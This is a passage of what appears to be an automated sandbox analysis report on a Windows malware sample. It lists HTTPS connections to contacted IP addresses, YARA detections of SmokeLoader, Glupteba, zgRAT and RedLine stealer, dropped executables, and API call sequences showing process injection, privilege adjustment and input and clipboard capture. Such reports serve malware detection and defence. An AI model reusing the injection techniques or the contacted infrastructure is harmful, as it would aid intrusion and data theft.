Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.163.105:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49860 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: W73PCbSH71.exe, type: SAMPLE
Source: Yara match	File source: 3.0.jfhrjta.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.toolspub2.exe.5515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jfhrjta.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.W73PCbSH71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.W73PCbSH71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jfhrjta, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Code function: 10_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

10_2_0040571B

Source: dialer.exe, 00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_5de45f59-7

Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Window created: window name: CLIPBRDWNDCLASS

Source: dialer.exe, 00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_10572837-b

Source: Yara match	File source: 34.3.dialer.exe.1b8f6310000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.dialer.exe.1b8f65f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.dialer.exe.1b8f6310000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 7536, type: MEMORYSTR

E-Banking Fraud

Yara detected Glupteba

Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2dd0e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.36c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 6508, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 36.2.7D14.exe.330000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.0.907.exe.c30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.2053247085.000000000058C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp

File dump: datapumpcrt.exe.29.dr 273342460

Jump to dropped file

PE file contains section with special chars

Source: 7D14.exe.1.dr	Static PE information: section name:
Source: 7D14.exe.1.dr	Static PE information: section name:
Source: 7D14.exe.1.dr	Static PE information: section name:

PE file has a writeable .text section

Source: W73PCbSH71.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401493
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_00402305 NtQuerySystemInformation,	0_2_00402305
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_00401410 NtAllocateVirtualMemory,	0_2_00401410
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_00402312 NtQuerySystemInformation,	0_2_00402312
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004014C3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014C3
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004014C8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014C8
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004022D3 NtQuerySystemInformation,	0_2_004022D3
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004022D5 NtQuerySystemInformation,NtQueryInformationProcess,	0_2_004022D5
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004022EA NtQuerySystemInformation,	0_2_004022EA
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004022F1 NtQuerySystemInformation,	0_2_004022F1
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_0040149E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040149E
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004014AC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014AC
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014B3
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00550110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	14_2_00550110
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_0040180C Sleep,NtTerminateProcess,	17_2_0040180C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_00401818 Sleep,NtTerminateProcess,	17_2_00401818
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_00401822 Sleep,NtTerminateProcess,	17_2_00401822
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_00401826 Sleep,NtTerminateProcess,	17_2_00401826
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_00401834 Sleep,NtTerminateProcess,	17_2_00401834
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00434140 NtAllocateVirtualMemory,NtFreeVirtualMemory,	21_2_00434140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00442440 NtAllocateVirtualMemory,NtFreeVirtualMemory,	21_2_00442440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00442680 NtAllocateVirtualMemory,NtFreeVirtualMemory,	21_2_00442680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043BAD0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	21_2_0043BAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00424DC0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	21_2_00424DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00433F60 NtAllocateVirtualMemory,NtFreeVirtualMemory,	21_2_00433F60
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00423B94 NtdllDefWindowProc_A,	24_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004125E8 NtdllDefWindowProc_A,	24_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0045687C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	24_2_0045687C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0042F394 NtdllDefWindowProc_A,	24_2_0042F394
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004776C4 NtdllDefWindowProc_A,	24_2_004776C4

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

Code function: 24_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

24_2_0042E7A8

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	10_2_00403532
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	13_2_00403532
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	19_2_00409448
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 22_2_00403382 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	22_2_00403382
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	24_2_00454B00

Source: C:\Users\user\AppData\Local\Temp\etopt.exe

File created: C:\Windows\Panther\UnattendGC\lua51.dll

Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_00402408	0_2_00402408
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_00402539	0_2_00402539
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004023C4	0_2_004023C4
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004023CF	0_2_004023CF
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004023EE	0_2_004023EE
Source: C:\Users\user\Desktop\W73PCbSH71.exe	Code function: 0_2_004023F6	0_2_004023F6
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F89B6B0	6_2_6F89B6B0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C4EE0	6_2_6F8C4EE0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F892D70	6_2_6F892D70
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8EAC29	6_2_6F8EAC29
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8E0B89	6_2_6F8E0B89
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F878B30	6_2_6F878B30
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8B4AC0	6_2_6F8B4AC0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8B4970	6_2_6F8B4970
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F87C7B0	6_2_6F87C7B0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F87A7E0	6_2_6F87A7E0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F876650	6_2_6F876650
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8EA54D	6_2_6F8EA54D
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8B4550	6_2_6F8B4550
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C63B0	6_2_6F8C63B0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8D2310	6_2_6F8D2310
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F88A0C0	6_2_6F88A0C0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8E9FFC	6_2_6F8E9FFC
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8EBFF1	6_2_6F8EBFF1
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C5EB9	6_2_6F8C5EB9
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8B3E50	6_2_6F8B3E50
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8E5DD2	6_2_6F8E5DD2
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C5DD0	6_2_6F8C5DD0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8B3C90	6_2_6F8B3C90
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8D1CA0	6_2_6F8D1CA0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8E9AAB	6_2_6F8E9AAB
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8EB964	6_2_6F8EB964
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C58D5	6_2_6F8C58D5
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C58D7	6_2_6F8C58D7
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C5830	6_2_6F8C5830
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8B3460	6_2_6F8B3460
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8B3260	6_2_6F8B3260
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C5274	6_2_6F8C5274
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8C5050	6_2_6F8C5050
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_0616BD99	6_2_0616BD99
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_06168AF8	6_2_06168AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02A50848	8_2_02A50848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02A51B68	8_2_02A51B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02A50838	8_2_02A50838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_02A51B59	8_2_02A51B59
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00406DC6	10_2_00406DC6
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_0040759D	10_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00406DC6	13_2_00406DC6
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_0040759D	13_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00410879	14_2_00410879
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004080DD	14_2_004080DD
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042A8FB	14_2_0042A8FB
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0041614B	14_2_0041614B
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042B1E6	14_2_0042B1E6
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004189FA	14_2_004189FA
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00419ACF	14_2_00419ACF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00428A9E	14_2_00428A9E
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004192A3	14_2_004192A3
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00404B45	14_2_00404B45
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00403B72	14_2_00403B72
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042A3B7	14_2_0042A3B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042B4EB	14_2_0042B4EB
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042BCAF	14_2_0042BCAF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042E56B	14_2_0042E56B
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00418ECF	14_2_00418ECF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00429E8C	14_2_00429E8C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004196AF	14_2_004196AF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042AF6B	14_2_0042AF6B
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Code function: 18_2_017F2338	18_2_017F2338
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 19_2_0040840C	19_2_0040840C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042609B	21_2_0042609B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00431158	21_2_00431158
